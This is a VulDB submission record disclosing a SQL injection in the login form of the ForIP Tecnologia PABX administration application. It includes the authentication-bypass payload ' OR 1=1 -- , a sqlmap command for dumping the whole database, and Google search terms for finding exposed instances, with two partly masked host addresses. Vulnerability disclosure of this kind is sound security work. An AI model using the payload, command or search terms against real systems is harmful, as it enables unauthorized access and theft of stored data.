| Title | For IP Tecnologia Ltda ForIP Tecnologia - Administração PABX 1.x SQL Injection |
|---|
| Description | A SQL injection vulnerability was found in the "usuario" parameter of the authentication form in the "ForIP Tecnologia - Administração PABX" application, where the value passed to the parameter is not sanitized by the application's backend, making SQL injection possible. As a result, an attacker can use the technique of closing the original SQL query and creating a condition that always evaluates to true, such as with the value: ' OR 1=1 -- , making it possible to log in with the first user in the database. Additionally, automated tools like SQLMAP can be used to perform a complete database dump.
By using Google, it is possible to find vulnerable applications. Searching for "ForIP Tecnologia - Administração PABX" reveals a host with the application exposed to the internet at: "https://165.x.x.x/". Additionally, using other techniques, such as searching Google for "LOGIN FORIP MANAGER", another exposed host can be found, also containing the vulnerability, at: "https://159.x.x.x/".
Using the sqlmap tool to perform a complete database dump:
sqlmap -u "https://{IP}:8443/login?usuario=admin&senha=123" --flush-session --ignore-code=401
All versions of the product are affected by the vulnerabilities.
|
|---|
| User | gabriel (UID 72007) |
|---|
| Submission | 07/17/2024 12:05 AM (11 months ago) |
|---|
| Moderation | 07/25/2024 11:53 AM (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 272423 [ForIP Tecnologia AdministraĆ§Ć£o PABX 1.x Authentication Form /login usuario sql injection] |
|---|
| Points | 17 |
|---|